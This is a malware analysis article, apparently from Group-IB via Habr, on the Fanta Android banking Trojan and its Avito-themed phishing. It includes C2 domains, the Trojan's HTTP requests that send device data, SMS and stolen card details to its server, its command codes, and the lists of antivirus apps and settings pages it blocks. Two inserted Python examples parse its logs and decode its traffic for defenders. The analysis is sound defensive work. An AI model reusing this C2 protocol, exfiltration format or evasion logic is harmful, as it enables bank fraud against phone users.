One day you decide to sell something on Avito and, after posting a detailed description of your item (say, a RAM module), you receive this message:
You tap the "Continue" button, and an APK file with a trustworthy-looking icon and name is downloaded to your Android phone. You install an application that, for some reason, asks for AccessibilityService permissions; a couple of windows flash up and disappear, and... that's it.
You go to check your balance, but for some reason your banking app asks you to enter your card details again. After you enter them, something awful happens: for reasons you cannot understand, money starts disappearing from your account. You try to deal with the problem, but your phone fights back: it presses the "Back" and "Home" keys on its own, refuses to switch off and will not let you enable any protective measures. In the end you are left without money, your goods are unsold, you are confused and wondering: what just happened?
The answer is simple: you have become a victim of the Android Trojan Fanta, a member of the Flexnet family. How did it happen? Let us explain.
Authors: Andrey Polovinkin, junior malware analysis specialist; Ivan Pisarev, malware analysis specialist.
Some statistics
The Flexnet family of Android Trojans was first spotted in 2015. Over its long period of activity the family has branched into several subspecies: Fanta, Limebot, Lipton, etc. The Trojan and the infrastructure behind it do not stand still: new and effective distribution schemes are being built (in our case, high-quality phishing pages aimed at a specific seller), and the Trojan developers follow the fashion in virus writing, adding new functionality that lets them steal money from infected devices more effectively and bypass protection mechanisms.
The campaign described in this article targets users in Russia; a small number of infected devices were recorded in Ukraine, and even fewer in Kazakhstan and Belarus.
Although Flexnet has been in the Android Trojan arena for more than 4 years and has been studied in detail by many researchers, it is still in good shape. Since January 2019 the potential damage exceeds 35 million rubles, and that is only for campaigns in Russia. Back in 2015 various versions of this Android Trojan were sold on underground forums, where the Trojan's source code could also be found with a detailed description. This means the worldwide damage figures are even more impressive. Not a bad record for such an old-timer, is it?
From sale to fraud
As can be seen from the screenshot shown earlier of a phishing page imitating the Avito classified-ads service, the page was prepared for a specific victim. Apparently, the attackers use one of the Avito parsers, which extracts the seller's phone number and name along with the item description. After deploying the page and preparing the APK file, the victim is sent an SMS with their name and a link to a phishing page containing the description of their item and the amount supposedly received from its "sale". Tapping the button delivers a malicious APK file to the user: Fanta.
A look at the shcet491[.]ru domain showed that it is delegated to Hostinger's DNS servers:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
The domain's zone file contains records pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243 and 31.220.23[.]235. However, the main resource record (the A record) points to a server with the IP address 178.132.1[.]240.
The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the hoster World Stream. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the UK and belong to the shared hosting server HOSTINGER. The registrar used is openprov-ru. The following domains also resolved to the IP address 178.132.1[.]240:
It should be noted that links of the following form were obtained from almost all of these servers:
http://(www.){0,1}<%domain%>/[0-9]{7}
The link from the SMS message also matches this pattern. Historical data showed that one domain corresponds to several links of the pattern shown above, which indicates that a single domain was used to distribute the Trojan to several victims.
Jumping ahead: the Trojan downloaded via the link from the SMS uses the address onuseseddohap[.]club as its control server. This domain was registered on 2019-03-12, and starting from 2019-04-29 APK applications began interacting with it. According to VirusTotal data, 109 applications interacted with this server. The domain itself resolves to the IP address 217.23.14[.]27, located in the Netherlands and belonging to the hoster World Stream. The registrar used is NAMECHEAP. The domains bad-racoon[.]club (starting from 2018-09-25) and bad-racoon[.]live (starting from 2018-10-25) also resolved to this IP address. More than 80 APK files interacted with the domain bad-racoon[.]club, and more than 100 with bad-racoon[.]live.
In general, the attack proceeds as follows:
What is under the hood of Fanta?
Like many other Android Trojans, Fanta can read and send SMS messages, make USSD requests and display its own windows on top of applications (including banking ones). However, the functional arsenal of this family has grown: Fanta has started using AccessibilityService for various purposes, such as reading the contents of notifications from other applications and preventing detection and termination of the Trojan on the infected device. Fanta runs on all Android versions from 4.4 upwards. In this article we take a closer look at the following Fanta sample:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Immediately after launch
Immediately after launch, the Trojan hides its icon. The application only runs if the name of the infected device is not in the following list:
- android_x86
- VirtualBox
- Nexus 5X
- Nexus 5
This check is performed in the Trojan's main service, MainService. On the first launch the application's configuration parameters are initialized with default values (the format used to store configuration data and the meaning of each value are discussed later), and the new infected device is registered with the control server. An HTTP POST request with the message type register_bot and information about the infected device (Android version, IMEI, phone number, operator name and the code of the country where the operator is registered) is sent to the server. The address hXXp://onuseseddohap[.]club/controller.php is used as the control server. In response, the server sends a message containing the fields bot_id, bot_pwd and server; the application stores these values as the CnC server parameters. The server field is optional: if it is not received, Fanta uses the registration address hXXp://onuseseddohap[.]club/controller.php. The ability to change the CnC address solves two problems: distributing the load evenly across several servers (with a large number of infected devices, the load on an unoptimized web server can be high), and switching to an alternative server if one of the CnC servers fails.
If an error occurs while sending the request, the Trojan repeats the registration procedure after 20 seconds.
Once the device is registered successfully, Fanta shows the user the following message:
Important detail: the service called System Security is the name of the Trojan's own service, and after the OK button is tapped, a window with the Accessibility settings of the infected device opens, in which the user is expected to grant Accessibility rights to the malicious service:
As soon as the user enables the AccessibilityService, Fanta gains access to the contents of application windows and the actions performed in them:
Immediately after obtaining Accessibility rights, the Trojan requests device administrator rights and the right to read notifications:
Using the AccessibilityService, the application simulates key presses and thereby grants itself all the rights it needs.
Fanta creates several database instances (described later) to store configuration data and the information it collects about the infected device while running. To send the collected information, the Trojan creates a recurring task that uploads records from the database to the server and receives a command from the control server. The interval for contacting the CnC depends on the Android version: on 5.1 the interval is 10 seconds, otherwise 60 seconds.
To receive a command, Fanta sends a GetTask request to the control server. In response, the CnC can send one of the following commands:
Command | Description
---|---
0 | Send an SMS message
1 | Make a phone call or a USSD command
2 | Update the interval parameter
3 | Update the intercept parameter
6 | Update the smsManager parameter
9 | Start collecting SMS messages
11 | Reset the phone to factory settings
12 | Enable/disable dialog logging
Fanta also collects notifications from 70 banking applications, fast payment systems and e-wallets and stores them in a database.
Storing configuration parameters
To store its configuration parameters, Fanta uses the standard Android approach: Shared Preferences files. The settings are saved in a file named settings. The stored parameters are described in the table below.
Name | Default value | Valid values | Description
---|---|---|---
id | 0 | Int | Bot ID
server | hXXp://onuseseddohap[.]club/ | URL | Control server address
pwd | - | String | Server password
interval | 20 | Int | Time interval. Indicates how long the following tasks are postponed
intercept | all | all/telNumber | If the field equals the string all or telNumber, an SMS message received by the application is intercepted and not shown to the user
smsManager | 0 | 0/1 | Enable/disable the application as the default SMS receiver
readDialog | false | true/false | Enable/disable AccessibilityEvent logging
Fanta also uses the file smsManager:
Name | Default value | Valid values | Description
---|---|---|---
pckg | - | String | Name of the SMS manager in use
Interaction with databases
During its operation the Trojan uses two databases. The database named a is used to store the various information collected from the phone. The second database is named fanta.db and stores the settings that control the creation of the phishing windows designed to collect bank card details.
The Trojan uses database a to store the collected information and to log its own actions. The data is kept in the table logs. The table is created with the following SQL query:
```sql
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
```
The database contains the following information:
1. A record of the infected device starting up, with the message Phone turned on!
2. Notifications from applications. The message is built according to the following template:
```text
(<%App Name%>)<%Title%>: <%Notification text%>
```
3. Bank card data from the phishing forms created by the Trojan. The VIEW_NAME parameter can be one of the following:
- AliExpress
- Avito
- Google Play
- Other <%App Name%>
The message is logged in the format:
```text
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
```
4. Incoming/outgoing SMS messages, in the format:
```text
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
```
5. Information about the package that created a dialog box, in the format:
```text
(<%Package name%>)<%Package information%>
```
Example of the logs table:
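When a copy of database a is recovered from an infected device, an analyst needs to turn the free-text d column of logs into structured records. The following Python is an added example for that triage step (not the Trojan's code and not Group-IB tooling): it applies the five record templates above, masks any captured card number before it can reach a report, and runs over a constructed in-memory copy of the table built with the page's own schema.

```python
import re
import sqlite3

# Schema copied from the page; used here only to build a constructed sample DB.
LOGS_SCHEMA = ("create table logs ( _id integer primary key autoincrement, "
               "d TEXT, f TEXT, p TEXT, m integer)")

TS = r"\d{2}:\d{2}:\d{2} \d{2}\.\d{2}\.\d{4}"
# Templates from the page, checked in the order that disambiguates them:
# card records start with "[time]", SMS records with "([time]", while
# notification and dialog records both start with "(name)" and only the
# notification template carries ": " after the title.
CARD_RE = re.compile(
    rf"^\[(?P<ts>{TS})\]\((?P<view>[^)]*)\) Номер карты:(?P<card>[^;]*); "
    r"Дата:(?P<month>\d{1,2})/(?P<year>\d{2,4}); CVV: ?(?P<cvv>\d{3,4})$")
SMS_RE = re.compile(
    rf"^\(\[(?P<ts>{TS})\] Тип: (?P<kind>Входящее|Исходящее)\) "
    r"(?P<number>[^:]*):(?P<text>.*)$", re.S)
NOTIF_RE = re.compile(r"^\((?P<app>[^)]*)\)(?P<title>[^:]*): (?P<text>.*)$", re.S)
DIALOG_RE = re.compile(r"^\((?P<pkg>[^)]*)\)(?P<info>.*)$", re.S)


def mask_pan(pan: str) -> str:
    """Keep the BIN (first 6) and last 4 digits; the full PAN is never stored."""
    digits = re.sub(r"\D", "", pan)
    if len(digits) < 10:
        return "*" * len(digits)
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def parse_log_entry(d: str) -> dict:
    """Classify one value of the d column into a structured record."""
    m = CARD_RE.match(d)
    if m:
        return {"kind": "card", "ts": m["ts"], "view": m["view"],
                "pan": mask_pan(m["card"]), "exp": f"{m['month']}/{m['year']}"}
    m = SMS_RE.match(d)
    if m:
        return {"kind": "sms", "ts": m["ts"],
                "direction": "in" if m["kind"] == "Входящее" else "out",
                "number": m["number"].strip(), "text": m["text"]}
    m = NOTIF_RE.match(d)
    if m:
        return {"kind": "notification", "app": m["app"],
                "title": m["title"], "text": m["text"]}
    m = DIALOG_RE.match(d)
    if m:
        return {"kind": "dialog", "package": m["pkg"], "info": m["info"]}
    return {"kind": "other", "text": d}   # e.g. the start-up message


def parse_logs_table(conn: sqlite3.Connection) -> list:
    """Walk the logs table of database a, oldest row first."""
    rows = conn.execute("select _id, d from logs order by _id").fetchall()
    return [dict(parse_log_entry(d), id=row_id) for row_id, d in rows]


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample rows in the page's formats (not from a real device)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(LOGS_SCHEMA)
    samples = [
        "(Bank App)Transfer: You received 1500 RUB",
        "[12:05:31 04.06.2019](Avito) Номер карты:4276123456789012; "
        "Дата:09/21; CVV: 123",
        "([12:06:02 04.06.2019] Тип: Входящее) +70000000000:Test code 4821",
        "(com.android.settings)Settings dialog",
    ]
    conn.executemany("insert into logs (d, f, p, m) values (?, '', '', 0)",
                     [(s,) for s in samples])
    return conn
```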
One of Fanta's functions is collecting bank card details. The data is collected by creating phishing windows when banking applications are opened. The Trojan creates each phishing window only once. Whether the window has already been shown to the user is recorded in the table settings in the database fanta.db. The database is created with the following SQL query:
```sql
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
```
All fields of the settings table are initialized to 1 by default (create a phishing window). After the user enters their data, the value is set to 0. Fields of the settings table:
- can_login - controls showing the form when a banking application is opened
- first_bank - not used
- can_avito - controls showing the form when the Avito application is opened
- can_ali - controls showing the form when the Aliexpress application is opened
- can_another - controls showing the form when any application from the following list is opened: Yula, Pandao, Drom Auto, Wallet. Discount and bonus cards, Aviasales, Booking, Trivago
- can_card - controls showing the form when Google Play is opened
Interaction with the control server
Network communication with the control server takes place over HTTP. For networking, Fanta uses the popular Retrofit library. Requests are sent to hXXp://onuseseddohap[.]club/controller.php. The server address can be changed when registering with the server. Cookies can be sent in the server's response. Fanta makes the following requests to the server:
- Registration of the bot with the control server happens once, on the first launch. The following data about the infected device is sent to the server:
· cookie - cookies received from the server (the default value is an empty string)
· mode - the string constant register_bot
· prefix - the integer constant 2
· version_sdk - built according to the template <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei - IMEI of the infected device
· country - code of the country where the operator is registered, in ISO format
· number - phone number
· operator - operator name
Example of a request sent to the server:
```http
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
In response to the request, the server should return a JSON object containing the following parameters:
· bot_id - ID of the infected device. If bot_id equals 0, Fanta repeats the request.
· bot_pwd - password for the server.
· server - control server address. Optional parameter. If the parameter is not specified, the address stored in the application is used.
Example JSON object:
```json
{
  "response": [
    {
      "bot_id": <%BOT_ID%>,
      "bot_pwd": <%BOT_PWD%>,
      "server": <%SERVER%>
    }
  ],
  "status": "ok"
}
```
- Request to receive a command from the server. The following data is sent to the server:
· cookie - cookies received from the server
· bid - ID of the infected device received in response to the register_bot request
· pwd - password for the server
· divice_admin - indicates whether device administrator rights have been obtained. If they have, the field equals 1, otherwise 0
· Accessibility - status of the Accessibility service. If the service is running, the value is 1, otherwise 0
· SMSManager - indicates whether the Trojan is enabled as the default SMS application
· screen - indicates the screen state. The value is 1 if the screen is on, otherwise 0
Example of a request sent to the server:
```http
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
Depending on the command, the server returns a JSON object with different parameters:
· Send SMS command: the parameters contain the phone number, the SMS text and the ID of the message to be sent. The identifier is used when sending a message of type setSmsStatus to the server.
```json
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
```
· Make a phone call or USSD command: the phone number or the command is in the response body.
```json
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
```
· Change the interval parameter command.
```json
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
```
· Change the intercept parameter command.
```json
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
```
· Change the SmsManager field command.
```json
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
```
· Collect SMS messages from the infected device command.
```json
{ "response": [ { "mode": 9 } ], "status":"ok" }
```
· Reset the phone to factory settings command:
```json
{ "response": [ { "mode": 11 } ], "status":"ok" }
```
· Change the ReadDialog parameter command.
```json
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
```
- Sending a message of type setSmsStatus. This request is made after the Send SMS command has been executed. The request looks like this:
```http
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>
```
- Uploading the database contents. One row is sent per request. The following data is sent to the server:
· cookie - cookies received from the server
· mode - the string constant setSaveInboxSms
· bid - ID of the infected device received in response to the register_bot request
· text - text of the current database record (field d of the logs table in database a)
· number - name of the current database record (field p of the logs table in database a)
· sms_mode - integer value (field m of the logs table in database a)
The request looks like this:
```http
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
If the message is delivered to the server successfully, the row is deleted from the table. Example of the JSON object returned by the server:
```json
{ "response":[], "status":"ok" }
```
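For a network analyst working from a capture, the request and response layouts above are enough to write a decoder. The following Python is an added example (not code from the page or from Group-IB): it flags a POST to controller.php whose form body carries one of the four mode values the Trojan uses, and translates a getTask response's numeric mode codes into the command names from the table earlier. The sample request and response are constructed; bid, password and task arguments are made-up values.

```python
import json
from urllib.parse import parse_qs

# Command codes from the page's GetTask table.
TASK_MODES = {
    0: "send_sms", 1: "call_or_ussd", 2: "set_interval", 3: "set_intercept",
    6: "set_sms_manager", 9: "collect_sms", 11: "factory_reset",
    12: "set_read_dialog",
}
# Request types the Trojan sends to controller.php.
BEACON_MODES = {"register_bot", "getTask", "setSmsStatus", "setSaveInboxSms"}


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def classify_beacon(raw: str):
    """Return (mode, fields) if the request matches the Fanta C2 pattern, else None."""
    req = parse_http_request(raw)
    if req["method"] != "POST" or not req["path"].endswith("/controller.php"):
        return None
    fields = {k: v[0] for k, v in parse_qs(req["body"]).items()}
    mode = fields.get("mode")
    if mode not in BEACON_MODES:
        return None
    # The okhttp User-Agent is common in benign apps; it only strengthens a
    # match that is already anchored on the body, it never decides on its own.
    fields["ua_match"] = req["headers"].get("user-agent", "").startswith("okhttp/")
    return mode, fields


def decode_tasks(body: str) -> list:
    """Decode a getTask response into named commands with their arguments."""
    doc = json.loads(body)
    if doc.get("status") != "ok":
        return []
    tasks = []
    for item in doc.get("response", []):
        mode = item.get("mode")
        args = {k: v for k, v in item.items() if k != "mode"}
        tasks.append({"command": TASK_MODES.get(mode, f"unknown_{mode}"), **args})
    return tasks


# Constructed samples following the page's request/response layout.
SAMPLE_GETTASK = (
    "POST /controller.php HTTP/1.1\r\nCookie: \r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: onuseseddohap.club\r\nConnection: close\r\n"
    "User-Agent: okhttp/3.6.0\r\n\r\n"
    "mode=getTask&bid=17&pwd=secret&divice_admin=1&Accessibility=1"
    "&SMSManager=0&screen=1"
)
SAMPLE_RESPONSE = (
    '{"response":[{"mode":0,"sms_number":"+70000000000","sms_text":"test",'
    '"sms_id":42},{"mode":2,"interval":30}],"status":"ok"}'
)
```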
Interaction with AccessibilityService
AccessibilityService exists to make Android applications easier to use for people with disabilities. In most cases, physical interaction is needed to operate an application; AccessibilityService allows this to be done programmatically. Fanta uses the service to create fake windows in banking applications and to prevent the user from opening system settings and certain applications.
Using AccessibilityService functionality, the Trojan monitors changes to elements on the screen of the infected device. As described earlier, the Fanta settings contain a parameter responsible for logging operations with dialog boxes: readDialog. If this parameter is set, information about the name and description of the package that triggered the event is added to the database. The Trojan performs the following actions when events fire:
- Simulates pressing the Back and Home keys in the following cases:
· if the user tries to reboot the device
· if the user tries to uninstall the "Avito" application or change its access rights
· if the "Avito" application is mentioned on the page
· when the Google Play Protect application is opened
· when pages with AccessibilityService settings are opened
· when the System Security dialog box is shown
· when the "Draw over other apps" settings page is opened
· when the "Applications", "Recovery and reset", "Data reset", "Reset settings", "Developer panel", "Special. features", "Special features" or "Special permissions" page is opened
· if the event was generated by one of the following applications. List of applications:
- ANDROID
- Clean Lite
- Clean Light
- Clean Master for x86 CPU
- Meizu Application Permission Management
- MIUI Security
- Clean Master - Antivirus & Cache and Junk Cleaner
- Parental Control and GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus & free protection 2019
- Mobile Security MegaFon
- AVG Protection for Xperia
- Mobile Security
- Malwarebytes antivirus & protection
- Antivirus for Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- AVG antivirus for Huawei tablet System
- Samsung Accessibility
- Samsung Smart Manager
- System Security
- Speed Booster
- Dr.Web
- Dr.Web Security Space
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus & Mobile Security
- Kaspersky Internet Security: Antivirus and Protection
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - protection and management
- AVG Antivirus free 2019 - Protection for Android
- Android Accessibility
- Norton Mobile Security and Antivirus
- Antivirus, firewall, VPN, mobile security
- Mobile Security: antivirus, VPN, anti-theft
- Antivirus for Android
- If permission is requested to send an SMS message to a short number, Fanta simulates ticking the Remember choice checkbox and pressing the send button.
- When an attempt is made to revoke the Trojan's administrator rights, it locks the phone screen.
- Prevents new device administrators from being added.
- If the dr.web antivirus application detects a threat, Fanta simulates pressing the ignore button.
- The Trojan simulates pressing the Back and Home buttons if the event was generated by the Samsung Device Care application.
- Fanta creates phishing windows with forms for entering bank card details if an application from a list of about 30 different Internet services is launched. Among them: AliExpress, Booking, Avito, the Google Play Market component, Pandao, Drom Auto, etc.
Phishing forms
Fanta watches which applications are running on the infected device. If an application of interest is opened, the Trojan shows a phishing window on top of all others: a form for entering bank card details. The user is asked to enter the following data:
- Card number
- Card expiry date
- CVV
- Cardholder name (not for all banks)
Depending on the running application, different phishing windows are shown. Below are examples of some of them:
AliExpress:
Avito:
For some other applications, e.g. Google Play Market, Aviasales, Pandao, Booking, Trivago:
How it really happened
Fortunately, the person who received the SMS message described at the beginning of this article turned out to be a cybersecurity specialist. So the real, non-dramatized version differs from the one told above: a person received an interesting SMS and then handed it over to the Group-IB Threat Hunting Intelligence team. The result of the attack is this article. A happy ending, isn't it? However, not every story ends so well, and to keep yours from looking like the dramatized version with the loss of money, in most cases it is enough to follow the rules that have been repeated for a long time:
- do not install applications on an Android OS mobile device from sources other than Google Play
- when installing an application, pay close attention to the permissions it requests
- pay attention to the extensions of downloaded files
- install Android OS updates regularly
- do not visit suspicious resources and do not download files from them
- do not tap links received in SMS messages.
Source: www.habr.com